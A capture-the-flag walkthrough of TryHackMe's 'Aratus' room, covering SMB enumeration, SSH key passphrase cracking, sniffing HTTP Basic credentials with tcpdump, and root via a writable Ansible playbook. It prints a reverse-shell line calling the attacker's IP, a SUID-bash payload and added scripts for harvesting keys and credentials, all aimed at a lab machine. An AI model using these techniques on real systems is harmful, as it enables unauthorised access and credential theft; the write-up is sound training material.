Aratus – Walkthrough En | TryHackMe – Write-up

Do you like reading? Do you like to go through tons of text? Aratus has what you need!

Aratus is a medium-difficulty CTF room on TryHackMe. Thorough enumeration is required to get a foothold on the system, and some curiosity is then needed to root the machine.

Enumeration

Command :

nmap -T5 -p- -sVC 10.10.196.56


There are quite a few interesting open ports, in particular FTP (21) and SMB (139, 445).

FTP enumeration

We will start with what looks simplest, the FTP service. It accepts anonymous logins: the ftp or anonymous account works without a password.

Command :

ftp 10.10.196.56

There is nothing interesting on the ftp server…

SMB enumeration

Ports 139 and 445 can be enumerated manually with tools such as smbget, smbclient and smbmap, but enum4linux does most of it automatically.

Command :

enum4linux 10.10.196.56

This quickly yields information about the available shares, as well as some usernames.

Retrieving the files - temporary share

The share is readable by everyone, without authentication. It contains many nested folders and files. There are several ways to pull all of its data.

Command :

smbclient "//10.10.196.56/temporary share"

(Do not forget the double quotes, otherwise the space between temporary and share breaks the path. Press Enter at the password prompt, or add -N, to connect as an anonymous user.)

First, we retrieve the message-to-simeon.txt file with this command:

mget message-to-simeon.txt

Message content :

Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!

Just make a folder in /opt for your book project…

Also your password is insecure, could you please change it? It is all over the place now!

 – Theodore

Reading between the lines, the message hints that a password (or a hash of it) is lying around in the text and will probably have to be cracked. First we need to find what to crack in the various texts we are about to retrieve.

Command to retrieve the chapters:

smbget -R "smb://10.10.196.56/temporary share/chapter1"

This command can be repeated for each chapter; it is simple and fast.

It is also possible to do this with a loop, like this:

for i in {1..9}; do smbget -R "smb://10.10.196.56/temporary share/chapter$i"; done

Finally, it is also possible to connect to the share with smbclient and download everything with these commands (prompt turns off the per-file confirmation, recurse enables recursive transfers):

smb: \> prompt

smb: \> recurse

smb: \> mget *

Analysis of the recovered files

There are a lot of them. The easiest approach is to go straight to the essentials by opening the whole tree in a text editor such as Sublime Text and searching it.

Command : 

subl .

In paragraph7.1, file text2, there is an SSH private key.

ssh2john

It must be copied into a file (id_rsa) and then cracked with John the Ripper.

Why?

Because it is protected by a passphrase, as shown by the Proc-Type: 4,ENCRYPTED header in the PEM block (an unencrypted key has no such line).

Command : 

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
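Searching the mirrored share by hand works for one key, but a small script is more reliable over nine chapters of text. The following is an added example, not code from the original write-up: it finds every PEM or OpenSSH private key under a directory and reports whether it is passphrase-protected, i.e. whether the ssh2john step is needed at all. It goes slightly beyond the page's case by also recognising the newer OpenSSH key format, where the cipher name in the decoded header (none, or a real cipher) gives the answer. The directory layout and key contents in the demo are constructed placeholders, not the room's files.

```bash
#!/bin/bash
# Added example (not from the original write-up): locate private keys in a
# mirrored share and tell passphrase-protected ones from plain ones.

# Returns 0 when a new-format "BEGIN OPENSSH PRIVATE KEY" block is encrypted.
# The decoded body starts with the magic "openssh-key-v1\0", then a 4-byte
# length and the cipher name; the cipher name "none" means no passphrase.
openssh_key_encrypted() {
    local header
    header=$(sed -n '/-----BEGIN OPENSSH PRIVATE KEY-----/,/-----END OPENSSH PRIVATE KEY-----/p' "$1" \
        | grep -v -e '-----' | base64 -d 2>/dev/null | head -c 40 \
        | LC_ALL=C tr -c '[:print:]\n' '.')
    # the NUL and the 4 length bytes were turned into 5 dots by tr
    ! printf '%s' "$header" | grep -q 'openssh-key-v1\.\{5\}none'
}

# find_private_keys DIR
# Prints one line per key found under DIR: "<encrypted|plain><TAB><path>".
find_private_keys() {
    local dir="$1" f
    grep -rIl -e '-----BEGIN .*PRIVATE KEY-----' "$dir" 2>/dev/null | sort \
    | while IFS= read -r f; do
        if grep -q -e '^Proc-Type: 4,ENCRYPTED' "$f"; then
            # traditional PEM (RSA/DSA/EC): the encryption is announced in the headers
            printf 'encrypted\t%s\n' "$f"
        elif grep -q -e '-----BEGIN OPENSSH PRIVATE KEY-----' "$f" && openssh_key_encrypted "$f"; then
            printf 'encrypted\t%s\n' "$f"
        else
            printf 'plain\t%s\n' "$f"
        fi
    done
}

# Constructed demo tree (placeholders, not the room's files): one encrypted
# PEM key, one plain new-format OpenSSH key, one chapter with no key at all.
build_demo_tree() {
    local dir="$1"
    mkdir -p "$dir/chapter7/paragraph7.1" "$dir/chapter3" "$dir/chapter1"
    printf -- '-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nQUJDREVGR0hJSktMTU5PUA==\n-----END RSA PRIVATE KEY-----\n' \
        > "$dir/chapter7/paragraph7.1/text2"
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        # header only ("openssh-key-v1", NUL, length 4, "none"); no real key material
        printf 'openssh-key-v1\0\0\0\0\4none' | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$dir/chapter3/text1"
    echo 'Plain prose, nothing to crack here.' > "$dir/chapter1/text1"
}

demo_dir=$(mktemp -d)
build_demo_tree "$demo_dir"
find_private_keys "$demo_dir"   # plain .../chapter3/text1, then encrypted .../chapter7/paragraph7.1/text2
rm -rf "$demo_dir"
```

Run it as find_private_keys ./temporary-share after the smbget loop; every line tagged encrypted is a candidate for ssh2john, every line tagged plain can be fed to ssh -i directly.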

SSH connection - Simeon

We now have Simeon's passphrase and SSH private key. All that is left is to log in over SSH (the key file must not be readable by others, or ssh refuses to use it).

Command :

chmod 600 id_rsa

ssh simeon@10.10.196.56 -i id_rsa

Once connected, linpeas (which has to be uploaded to the machine first) reports that we are allowed to capture network traffic with tcpdump.


This also matches the pcap hint given on TryHackMe.


tcpdump

We will listen on the loopback interface lo. On the external interface (eth1 here), our own SSH session generates far too much noise.

Command :

tcpdump -i lo

There is an HTTP GET request to /test-auth/index.html. By default tcpdump only prints packet summaries, not the payload, so the content of the request is not visible. We therefore capture again, this time writing the packets to a file in pcap format.

Command :

tcpdump -i lo -w cap.pcap

Wait at least two minutes, so that at least one full minute is covered: a scheduled task runs every minute, and that is the traffic we want to capture.

No way to extract the pcap file to Kali

I failed to do so. The file has to be opened on the target, and a raw pcap is not very readable. But on closer inspection (for instance with strings, or with tcpdump -A -r cap.pcap to print the payload as ASCII), we see the connection and also an authentication encoded in base64: HTTP Basic authentication sends user:password base64-encoded in the Authorization header, so base64 -d recovers the clear-text password.
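Since the capture has to be analysed on the target, the practical approach is to turn it into text (tcpdump -A -r cap.pcap, or simply strings cap.pcap) and pull the Authorization headers out of it. The following is an added example, not code from the original write-up. It reads that text on stdin, decodes every distinct Authorization: Basic value and prints user:password; because the scheduled job repeats the request every minute, identical headers are collapsed into one line. The sample capture text and the credential in it (user:password) are constructed placeholders, not the room's real data.

```bash
#!/bin/bash
# Added example (not from the original write-up): extract and decode HTTP
# Basic credentials from the ASCII view of a capture, e.g.
#   tcpdump -A -r cap.pcap | decode_basic_auth
#   strings cap.pcap | decode_basic_auth

# Reads capture text on stdin, prints each distinct credential as "user:password".
decode_basic_auth() {
    LC_ALL=C grep -a -o 'Authorization: Basic [A-Za-z0-9+/=]*' \
        | awk '{ print $3 }' | sort -u \
        | while IFS= read -r b64; do
            # the header value is plain base64 of "user:password", not encryption
            if decoded=$(printf '%s' "$b64" | base64 -d 2>/dev/null); then
                printf '%s\n' "$decoded"
            fi
        done
}

# Constructed sample of what "tcpdump -A -r cap.pcap" prints for the request
# seen on lo every minute (placeholder credential, not the room's real one).
sample_capture() {
    local i
    for i in 1 2; do
        printf 'GET /test-auth/index.html HTTP/1.1\r\nHost: localhost\r\nUser-Agent: curl\r\nAuthorization: Basic dXNlcjpwYXNzd29yZA==\r\n\r\n'
        printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n'
    done
}

sample_capture | decode_basic_auth   # prints: user:password
```

On the target, the same function also works on the live interface without writing a file: tcpdump -i lo -A 2>/dev/null | decode_basic_auth, left running for a little over a minute.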

Login to Theodore's account

Once decoded, the password gives access to Theodore's account with this command:

su theodore


In the /opt folder there are two folders, ansible and scripts.

Content of the infra_as_code.sh script

Privilege escalation

There is only one way to reach the root account: modifying the setup-RedHat.yml file. The infra_as_code.sh script itself cannot be modified, no path injection is possible, and no other file is writable. Only setup-RedHat.yml is.

To understand why this file matters, first run sudo -l.


Running the script

Command :

sudo -u automation /opt/scripts/infra_as_code.sh

As the following capture shows, there is an event (an Ansible task) concerning setup-RedHat.yml.


And this .yml can be modified. The + at the end of the permission string (-rw-rw-r--+) means an ACL is attached to the file; getfacl setup-RedHat.yml lists the extra entry that grants write access beyond what the basic mode bits show.

Editing the setup-RedHat.yml file

Replace the command of the task that ensures the httpd certs… (the last part of the yml file) with the payload. The task's when line must also be removed: that conditional decides whether the task runs at all, and with it in place the reverse shell would never be executed.

Once the modification has been made, you must relaunch the script.

Command :

sudo -u automation /opt/scripts/infra_as_code.sh

Catching the reverse shell on a netcat listener

The command bash -i >& /dev/tcp/10.11.38.124/1234 0>&1 may not work: if the task uses Ansible's command module, the command is executed without a shell, so the redirections are never interpreted (the shell module, or wrapping the payload in /bin/bash -c '...', avoids this). Alternatively, have the task set the SUID bit on bash with this command:

chmod u+s /bin/bash

(chmod +x would only set the execute bit, which bash already has; u+s is the SUID bit.) Once the playbook has run it as root, starting /bin/bash -p as theodore keeps root as the effective user.


That’s all folks

Thank you for taking the time to visit the site and read this write-up.

I hope it was useful and taught you new things.

Feel free to leave a comment or share this article.
